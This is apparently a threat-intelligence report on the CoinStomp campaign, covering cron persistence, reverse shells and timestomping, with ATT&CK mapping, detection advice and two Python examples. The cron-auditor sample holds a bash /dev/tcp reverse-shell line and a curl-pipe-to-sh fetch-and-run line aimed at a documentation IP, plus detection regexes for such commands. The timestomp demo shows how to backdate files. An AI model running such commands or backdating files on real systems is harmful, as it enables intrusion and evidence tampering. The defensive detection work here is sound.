Full Report
On 2022-02-02, a campaign attributed to the CoinStomp operator was reported. The initial access vector is not stated in the source. Observed techniques: timestomping, reverse shell, and cron persistence. Tools observed: CoinStomp.
Analysis Summary
# Tool/Technique: CoinStomp
## Overview
CoinStomp is identified as a malware family used by the "CoinStomp operator" in a campaign targeting cloud service providers, primarily in Asia. It gives the operator remote access to compromised systems and keeps that access across reboots.
## Technical Details
- Type: Malware family
- Platform: Not explicitly stated; cron persistence and a reverse shell imply Linux hosts in cloud environments.
- Capabilities: Persistence via cron; interactive remote command execution via a reverse shell; forensic evasion via timestomping.
- First Seen: February 2, 2022 (date of the campaign report; the activity itself may predate it).
## MITRE ATT&CK Mapping
The techniques named in the campaign report map to ATT&CK as follows (the mapping is this summary's, not the source's):
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell (the reverse shell is an interactive shell spawned on the victim with its I/O bound to a network socket)
- **TA0003 - Persistence**
- T1053.003 - Scheduled Task/Job: Cron
- **TA0005 - Defense Evasion**
- T1070.006 - Indicator Removal: Timestomp
- **TA0011 - Command and Control**
- *Note: a reverse shell is an outbound connection to operator infrastructure; the source does not describe the transport or any proxying, so no C2 sub-technique is assigned. The source reports no privilege-escalation technique.*
## Functionality
### Core Capabilities
- **Reverse Shell:** Establishing an outbound connection back to the attacker for interactive command execution.
- **Persistence:** Utilizing **Cron persistence** to ensure the malware or subsequent access mechanisms survive system reboots.
### Advanced Features
- **Timestomping:** Modifying file timestamps (typically atime/mtime) so dropped files blend in with legitimate system files and do not stand out in timeline-based triage.
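The timestomping described above, as an added example that is not code from the CoinStomp report: on Linux, `touch -r` and the `utime` family of calls (`os.utime` in Python, `utimensat(2)` underneath) can set a file's atime and mtime to any value, but the kernel sets ctime to the current time on every such call and offers no userspace way to set it. That leaves two checkable tells: a file whose mtime is far older than its ctime, and an mtime that exactly matches the reference file it was copied from. The directory, file names and the one-year backdating are constructed for the demo; the thresholds are hypothetical.

```python
"""Timestomping on Linux and the tell it leaves behind (added example)."""
import os
import tempfile
import time


def stomp_like_touch_r(target: str, reference: str) -> None:
    """Copy reference's atime/mtime onto target, as `touch -r reference target` does.
    os.utime with ns= calls utimensat(2); ctime is NOT settable this way."""
    st = os.stat(reference)
    os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))


def mtime_ctime_skew(path: str) -> float:
    """Seconds by which ctime is newer than mtime. A large positive skew on a
    recently created file is consistent with timestomping, but also with a
    timestamp-preserving copy or package extraction, so treat it as a lead."""
    st = os.stat(path)
    return (st.st_ctime_ns - st.st_mtime_ns) / 1e9


def shares_mtime_with(path: str, reference: str) -> bool:
    """Exact nanosecond-precision mtime collision with a candidate reference
    file (e.g. a binary in /bin) is a much stronger indicator than skew alone."""
    return os.stat(path).st_mtime_ns == os.stat(reference).st_mtime_ns


def demo(max_skew_s: float = 3600.0) -> dict:
    """Create a 'reference' file backdated one year and a freshly dropped file,
    stomp the dropped file, and report what the two checks see before and after."""
    with tempfile.TemporaryDirectory() as d:
        ref = os.path.join(d, "reference.bin")        # constructed stand-in for a system binary
        dropped = os.path.join(d, "dropped.bin")      # constructed stand-in for the payload
        with open(ref, "wb") as f:
            f.write(b"constructed reference")
        year_ago_ns = time.time_ns() - 365 * 86400 * 10**9
        os.utime(ref, ns=(year_ago_ns, year_ago_ns))   # make the reference look old
        with open(dropped, "wb") as f:
            f.write(b"constructed payload")
        before = mtime_ctime_skew(dropped)              # ~0: just written
        stomp_like_touch_r(dropped, ref)
        after = mtime_ctime_skew(dropped)               # ~one year: ctime stayed "now"
        return {
            "skew_before_s": before,
            "skew_after_s": after,
            "shares_mtime": shares_mtime_with(dropped, ref),
            "flagged": after > max_skew_s and shares_mtime_with(dropped, ref),
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

On a real host the same two functions can be run over recently created files (by ctime) in locations an operator would drop into, comparing each against the mtimes of common system binaries; on ext4 the creation time (`crtime`) reported by `stat` on recent coreutils or by `debugfs` is a further value that `utimensat` cannot rewrite.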
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A (Specific C2 infrastructure not detailed in the context)
- Behavioral Indicators: Observed use of Cron jobs for persistence, execution of reverse shells, and file timestamp manipulation (Timestomping).
## Associated Threat Actors
- CoinStomp operator
## Detection Methods
- **Signature-based detection:** Signatures or hashes for the CoinStomp binary itself, where a vendor has published them (none are given in the source).
- **Behavioral detection:** Alert on creation or modification of files under `/etc/cron*` and in user crontab spools, especially entries that run from `/tmp`, `/dev/shm` or hidden directories or that pipe downloaded content into a shell; on outbound connections made by shells or by processes that do not normally talk to the network (a reverse shell is a `bash`/`sh` with its standard streams attached to a socket); and on `utimensat()`/`utimes()` calls (for example via an auditd rule) or files whose mtime is far older than their ctime, which is the residue timestomping cannot remove.
## Mitigation Strategies
- **Prevention measures:** Run cloud workloads with least privilege and without unnecessary interactive shells or compilers; apply egress filtering that allows only known destinations, which breaks a reverse shell to arbitrary operator infrastructure.
- **Hardening recommendations:** Regularly audit `/etc/crontab`, `/etc/cron.d/*` and user crontabs for unauthorized entries, and put those paths under file integrity monitoring so a new or changed entry raises an alert rather than waiting for a periodic review.
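The cron audit called for under Detection Methods and Hardening, as an added example that is not the report's or the operator's code: it parses crontab text in both the system format (`/etc/crontab`, `/etc/cron.d/*`, which carry a user field) and the user format (spool files, which do not), then flags commands carrying generic reverse-shell and drop-and-run patterns. The sample crontab contents, the `198.51.100.7` address (documentation range) and the file paths in `SAMPLE` are constructed; the pattern list is a starting point, not a CoinStomp signature.

```python
"""Audit cron entries for reverse-shell and persistence patterns (added example)."""
import re
from dataclasses import dataclass, field

# Generic indicators a legitimate scheduled job rarely contains: (label, regex).
SUSPICIOUS = [
    ("bash-dev-tcp",       re.compile(r"/dev/(tcp|udp)/")),             # bash socket redirection
    ("netcat-exec",        re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),  # nc -e /bin/sh
    ("download-pipe",      re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("base64-pipe",        re.compile(r"base64\s+(-d|--decode).*\|\s*(ba)?sh\b")),
    ("world-writable-dir", re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/")),
    ("hidden-path",        re.compile(r"/\.[^/\s]+/")),                  # e.g. /home/x/.cache/... (noisy; review)
]


@dataclass
class CronEntry:
    source: str
    line_no: int
    schedule: str
    user: str
    command: str
    hits: list = field(default_factory=list)


def parse_cron(text: str, source: str, system_format: bool) -> list:
    """Parse crontab text. system_format=True means a user field follows the
    schedule (/etc/crontab, /etc/cron.d/*); user crontabs omit it.
    Blank lines, comments and VAR=value lines are skipped."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        sched_fields = 1 if line.startswith("@") else 5   # @reboot etc. vs m h dom mon dow
        n_split = sched_fields + (1 if system_format else 0)
        parts = line.split(None, n_split)
        if len(parts) < n_split + 1:
            continue  # malformed; cron would reject it as well
        schedule = " ".join(parts[:sched_fields])
        user = parts[sched_fields] if system_format else "(owner)"
        entries.append(CronEntry(source, n, schedule, user, parts[-1]))
    return entries


def score(entry: CronEntry) -> CronEntry:
    """Attach the labels of every pattern the command matches; @reboot is
    noted separately because it is the classic survive-a-reboot hook."""
    entry.hits = [label for label, rx in SUSPICIOUS if rx.search(entry.command)]
    if entry.schedule == "@reboot":
        entry.hits.append("runs-at-boot")
    return entry


def audit(sources: dict) -> list:
    """sources maps (path, system_format) -> file text. Returns flagged entries."""
    flagged = []
    for (path, system_format), text in sources.items():
        for entry in parse_cron(text, path, system_format):
            if score(entry).hits:
                flagged.append(entry)
    return flagged


# Constructed sample: one benign system job, then a user spool with a reverse
# shell re-launched every minute, a boot-time fetch-and-run, and a benign cleanup.
SAMPLE = {
    ("/etc/cron.d/sysstat", True): (
        "SHELL=/bin/sh\n"
        "5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1\n"
    ),
    ("/var/spool/cron/crontabs/www-data", False): (
        "# m h dom mon dow command\n"
        "* * * * * bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'\n"
        "@reboot curl -s http://198.51.100.7/x.sh | sh\n"
        "0 3 * * * /usr/bin/find /var/www/cache -mtime +7 -delete\n"
    ),
}


if __name__ == "__main__":
    for e in audit(SAMPLE):
        print(f"{e.source}:{e.line_no} user={e.user} [{', '.join(e.hits)}] {e.command}")
```

To run it against a live host, read `/etc/crontab` and `/etc/cron.d/*` with `system_format=True` and the spool directory (`/var/spool/cron/crontabs/` on Debian-family systems, `/var/spool/cron/` on RHEL-family) with `system_format=False`; the `hidden-path` and `world-writable-dir` rules will produce some benign hits, which is acceptable for a review queue but should be tuned before they feed an alert.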
## Related Tools/Techniques
- Reverse Shell (General technique)
- Cron persistence (Specific persistence mechanism)
- Timestomping (Forensic evasion technique)